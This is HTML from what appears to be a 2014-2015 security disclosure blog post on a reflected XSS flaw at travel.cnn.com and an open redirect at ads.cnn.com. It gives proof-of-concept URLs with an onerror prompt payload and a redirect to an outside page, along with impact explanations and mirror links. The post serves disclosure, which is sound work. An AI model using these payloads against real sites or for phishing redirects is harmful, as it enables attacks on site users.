<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both;">
<a href="http://2.bp.blogspot.com/-enV42qGMeAg/VKDIA4Pz_DI/AAAAAAAAAkw/_jtlQPYgQH4/s1600/twitter-spam-leverages-cnn-open-redirection-vulnerability.jpg" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="291" src="http://2.bp.blogspot.com/-enV42qGMeAg/VKDIA4Pz_DI/AAAAAAAAAkw/_jtlQPYgQH4/s400/twitter-spam-leverages-cnn-open-redirection-vulnerability.jpg" width="400" /></span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Figure from ehackingnews.com</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">At the same time, the cybercriminals have also leveraged a similar vulnerability in a Yahoo domain to trick users into thinking that the links point to a trusted website.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Yahoo Open Redirects Vulnerabilities:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html">http://securityrelated.blogspot.com/2014/12/yahoo-yahoocom-yahoocojp-open-redirect.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b><2></b> CNN.com XSS hacked</span></div>
<div>
<a href="http://seclists.org/fulldisclosure/2007/Aug/216" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://seclists.org/<wbr></wbr>fulldisclosure/2007/Aug/216</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">Several other similar products 0-day vulnerabilities have been found by some other bug hunter researchers before. CNN has patched some of them. BugTraq is a full disclosure moderated mailing list for the *detailed* discussion and announcement of computer security vulnerabilities: what they are, how to exploit them, and how to fix them. The below things be posted to the Bugtraq list: (a) Information on computer or network related security vulnerabilities (UNIX, Windows NT, or any other). (b) Exploit programs, scripts or detailed processes about the above. (c) Patches, workarounds, fixes. (d) Announcements, advisories or warnings. (e) Ideas, future plans or current works dealing with computer/network security. (f) Information material regarding vendor contacts and procedures. (g) Individual experiences in dealing with above vendors or security organizations. (h) Incident advisories or informational reporting. (i) New or updated security tools. A large number of the fllowing web securities have been published here, Buffer overflow, HTTP Response Splitting (CRLF), CMD Injection, SQL injection, Phishing, Cross-site scripting, CSRF, Cyber-attack, Unvalidated Redirects and Forwards, Information Leakage, Denial of Service, File Inclusion, Weak Encryption, Privilege Escalation, Directory Traversal, HTML Injection, Spam. It also publishes suggestions, advisories, solutions details related to XSS and URL Redirection vulnerabilities and cyber intelligence recommendations.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1) CNN (cnn.com) Travel-City Related Links XSS (cross site scripting) Web Security Bugs</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">travel.cnn.com/</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The programming bug flaws occur at "/city/<wbr></wbr>all" pages. All links under this URL are vulnerable to XSS attacks, e.g</span></div>
<div>
<a href="http://travel.cnn.com/city/all/all/washington?page=0%2C1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://travel.cnn.com/city/<wbr></wbr>all/all/washington?page=0%2C1</span></a></div>
<div>
<a href="http://travel.cnn.com/city/all/all/tokyo/all?page=0%2C1" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://travel.cnn.com/city/<wbr></wbr>all/all/tokyo/all?page=0%2C1</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">XSS may allow a remote attacker to create a specially crafted request that would execute arbitrary script code in a user's browser session within the trust relationship between their browser and the server. Base on Acunetix, exploited XSS is commonly used to achieve the following malicious results</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span>
<br />
<ul>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Identity theft</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Accessing sensitive or restricted information</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Gaining free access to otherwise paid for content</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Spying on user’s web browsing habits</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Altering browser functionality</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Public defamation of an individual or corporation</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Web application defacement</span></li>
<li><span style="font-family: Arial, Helvetica, sans-serif;">Denial of Service attacks</span></li>
</ul>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The code programming flaw can be exploited without user login. Tests were performed on Firefox (34.0) in Ubuntu (14.04) and IE (9.0.15) in Windows 7.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><a href="http://4.bp.blogspot.com/-zZ_v5RyGwPw/VKDVnz3aiYI/AAAAAAAAAlQ/dcGepg4mmos/s1600/cnn_travel_city_xss1.png" imageanchor="1" style="clear: left; float: left; margin-bottom: 1em; margin-right: 1em;"><span style="color: black; font-family: Arial, Helvetica, sans-serif;"><img border="0" height="253" src="http://4.bp.blogspot.com/-zZ_v5RyGwPw/VKDVnz3aiYI/AAAAAAAAAlQ/dcGepg4mmos/s400/cnn_travel_city_xss1.png" width="400" /></span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></b><b><span style="font-family: Arial, Helvetica, sans-serif;">PoC:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://travel.cnn.com/city/all/all/tokyo/all" target="_blank">http://travel.cnn.com/city/<wbr></wbr>all/all/tokyo/all</a>' /"><img src=x onerror=prompt(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://travel.cnn.com/city/all/all/bangkok/all" target="_blank">http://travel.cnn.com/city/<wbr></wbr>all/all/bangkok/all</a>' /"><img src=x onerror=prompt(/justqdjing/)></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(1.1) <span style="line-height: 21.7777786254883px; text-align: justify;">Poc Video:</span></span></b></div>
<div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=Cu47XiDV38M&feature=youtu.be</a></span></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Details:</span></b></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-city-related-links.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-travel-city-related-links.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">(2) CNN cnn.com ADS Open Redirect Web Security Bug</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Domain:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">ads.cnn.com</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">Vulnerability Description:</span></b></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The programming code flaw occurs at "event.ng" page with "&Redirect" parameter, i.e.</span></div>
<div>
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fgoogle.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2fgoogle.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;">From OWASP, an open redirect is an application that takes a parameter and redirects a user to the parameter value without any validation. This vulnerability is used in phishing attacks to get users to visit malicious sites without realizing it. This could allow a user to create a specially crafted URL, that if clicked, would redirect a victim from the intended legitimate web site to an arbitrary web site of the attacker's choosing. Such attacks are useful as the crafted URL initially appear to be a web page of a trusted site. This could be leveraged to direct an unsuspecting user to a web page containing attacks that target client side software such as a web browser or document rendering programs.</span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<span style="font-family: Arial, Helvetica, sans-serif;">The vulnerabilities can be attacked without user login. Tests were performed on Microsoft IE (10.0.9200.16750) of Windows 8, Mozilla Firefox (34.0) & Google Chromium 39.0.2171.65-0 ubuntu0.14.04.1.1064 (64-bit) of Ubuntu (14.04),Apple Safari 6.1.6 of Mac OS X Lion 10.7. </span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b>Use the following tests to illustrate the scenario painted above.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">The redirected webpage address is "<a href="http://webcabinet.tumblr.com/">http://webcabinet.tumblr.com/</a>". Suppose that this webpage is malicious.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Vulnerable URL:</span></div>
<div>
<a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2fcnn.com" target="_blank"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2fcnn.com</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">POC:</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ads.cnn.com/event.ng/Type=click&FlightID=92160&AdID=125504&TargetID=1346&RawValues=&Redirect=http:%2f%2ftetraph.com%2Fblog" target="_blank">http://ads.cnn.com/event.ng/<wbr></wbr>Type=click&FlightID=92160&<wbr></wbr>AdID=125504&TargetID=1346&<wbr></wbr>RawValues=&Redirect=http:%2f%<wbr></wbr>2f</a><a href="http://webcabinet.tumblr.com/">webcabinet.tumblr.com</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br class="Apple-interchange-newline" /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;">Since CNN is well-known worldwide, this vulnerability can be used to do "<a href="http://tetraph.com/covert_redirect/">Covert Redirect</a>" attacks to other websites.</span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><b>(2.1) </b><b style="line-height: 21.7777786254883px; text-align: justify;">Poc Video:</b></span></div>
<div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">https://www.youtube.com/watch?v=FE8lhDvKGN0&feature=youtu.be</a></span></div>
<div style="line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="color: #333333; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; font-size: 14.4444446563721px; line-height: 21.7777786254883px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<div style="margin: 0px; outline: none; padding: 0px;">
<b><span style="font-family: Arial, Helvetica, sans-serif;">Blog Detail:</span></b></div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-ads-open-redirect-security.html" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-ads-open-redirect-security.html</a></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.6000003814697px; text-align: justify;"><br class="Apple-interchange-newline" />Those vulnerabilities were reported to CNN in early July by Contact from Here. But they are still not been patched yet.</span><br />
<span style="font-family: Arial, Helvetica, sans-serif; line-height: 19.6000003814697px; text-align: justify;"><a href="http://edition.cnn.com/feedback/#cnn_FBKCNN_com" style="-webkit-transition: color 0.3s; color: #009eb8; display: inline; font-family: 'Helvetica Neue Light', HelveticaNeue-Light, 'Helvetica Neue', Helvetica, Arial, sans-serif; outline: none; text-decoration: none; transition: color 0.3s;">http://edition.cnn.com/feedback/#cnn_FBKCNN_com</a></span><br />
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div style="line-height: 19.6000003814697px; margin: 0px; outline: none; padding: 0px; text-align: justify;">
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div>
<b><span style="font-family: Arial, Helvetica, sans-serif;">More Details:</span></b><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://seclists.org/fulldisclosure/2014/Dec/128">http://seclists.org/fulldisclosure/2014/Dec/128</a></span><br />
<a href="http://lists.openwall.net/full-disclosure/2014/12/29/6"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://lists.openwall.net/full-disclosure/2014/12/29/6</span></a><br />
<a href="http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1395"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://permalink.gmane.org/gmane.comp.security.fulldisclosure/1395</span></a><br />
<a href="http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure&m=141988778706126&w=2"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://static-173-79-223-25.washdc.fios.verizon.net/?l=full-disclosure</span></a><br />
<a href="http://securitypost.tumblr.com/post/107868680057/ithut-cnn-cnn-com-travel-city-related-links"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">http://securitypost.tumblr.com/post/107868680057/ithut-cnn-cnn-com-travel</span></a><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ittechnology.lofter.com/post/1cfbf60d_5500df0">http://ittechnology.lofter.com/post/1cfbf60d_5500df0</a></span><br />
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://ithut.tumblr.com/post/120833062743/cnn-xss-url-redirection-bug" target="_blank">http://ithut.tumblr.com/post/<wbr></wbr>120833062743/cnn-xss-url-<wbr></wbr>redirection-bug</a></span><br />
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://www.tetraph.com/blog/it-news/cnn-xss-url-redirect-bug/">http://www.tetraph.com/blog/it-news/cnn-xss-url-redirect-bug/</a></span></div>
<div>
<a href="http://tetraph.blogspot.com/2015/06/cnn-xss-redirect-bug.html" style="font-family: Arial, Helvetica, sans-serif;">http://tetraph.blogspot.com/2015/06/cnn-xss-redirect-bug.html</a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://biyiniao.wordpress.com/2015/01/08/cnn-xss-open-redirect-bug/" target="_blank">https://biyiniao.wordpress.<wbr></wbr>com/2015/01/08/cnn-xss-open-<wbr></wbr>redirect-bug/</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://whitehatpost.blog.163.com/blog/static/24223205420155613753998/" target="_blank">http://whitehatpost.blog.163.<wbr></wbr>com/blog/static/<wbr></wbr>24223205420155613753998/</a></span></div>
<div>
<a href="https://plus.google.com/u/0/+wangfeiblackcookie/posts/bFkukxiUfXK"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://plus.google.com/u/0/+wangfeiblackcookie/posts/bFkukxiUfXK</span></a></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=674936469318135&id=594347777377005" target="_blank">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>674936469318135</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://diebiyi.com/articles/news/cnn-xss-url-redirect-bug/">http://diebiyi.com/articles/news/cnn-xss-url-redirect-bug/</a></span></div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="https://twitter.com/yangziyou/status/607060937309159425">https://twitter.com/yangziyou/status/607060937309159425</a></span></div>
<div>
<a href="https://redysnowfox.wordpress.com/2014/12/31/cnn-xss-url-redirect-bug/"><span style="color: black; font-family: Arial, Helvetica, sans-serif;">https://redysnowfox.wordpress.com/2014/12/31/cnn-xss-url-redirect-bug/</span></a></div>
<div>
<span style="color: black; font-family: Arial, Helvetica, sans-serif;"><a href="https://www.facebook.com/permalink.php?story_fbid=1043534509019886&id=922151957824809" target="_blank">https://www.facebook.com/<wbr></wbr>permalink.php?story_fbid=<wbr></wbr>1043534509019886</a></span></div>
<div>
<a href="http://whitehatpost.lofter.com/post/1cc773c8_7338196" style="font-family: Arial, Helvetica, sans-serif;" target="_blank">http://whitehatpost.lofter.<wbr></wbr>com/post/1cc773c8_7338196</a></div>
</div>
<div>
<span style="font-family: Arial, Helvetica, sans-serif;"><a href="http://securityrelated.blogspot.sg/2014/12/cnn-cnncom-travel-xss-and-ads-open.html">http://securityrelated.blogspot.com/2014/12/cnn-cnncom-travel-xss-and</a></span><br />
<br />
<span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span><span style="font-family: Arial, Helvetica, sans-serif;"><br /></span></div>
<div class="separator" style="clear: both; text-align: center;">
</div>
<div style="-webkit-text-stroke-width: 0px; background-color: white; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<div style="margin: 0px;">
</div>
</div>
<br />
<div style="-webkit-text-stroke-width: 0px; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: start; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
<br /></div>
<div style="text-align: start;">
</div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
</div>
<div style="text-align: start;">
</div>
<div class="separator" style="-webkit-text-stroke-width: 0px; clear: both; color: black; font-family: 'Times New Roman'; font-size: medium; font-style: normal; font-variant: normal; font-weight: normal; letter-spacing: normal; line-height: normal; margin: 0px; orphans: auto; text-align: center; text-indent: 0px; text-transform: none; white-space: normal; widows: auto; word-spacing: 0px;">
</div>
essayjeanshttp://www.blogger.com/profile/11019920613685827608noreply@blogger.com0tag:blogger.com,1999:blog-827796800660023204.post-53939905742051847522015-06-05T07:49:00.000-07:002015-06-05T07:57:38.424-07:00ESPN espn.go.com Login & Register Page XSS and Dest Redirect Privilege Escalation Web Security Vulnerabilities<div>
